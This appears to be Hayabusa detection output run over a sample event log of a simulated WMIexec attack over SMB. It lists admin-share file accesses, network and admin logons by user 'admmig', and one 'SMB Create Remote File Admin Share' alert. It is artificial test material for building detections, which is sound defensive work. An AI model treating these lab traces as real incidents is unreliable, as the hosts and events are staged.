10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-23 07:09:25.389 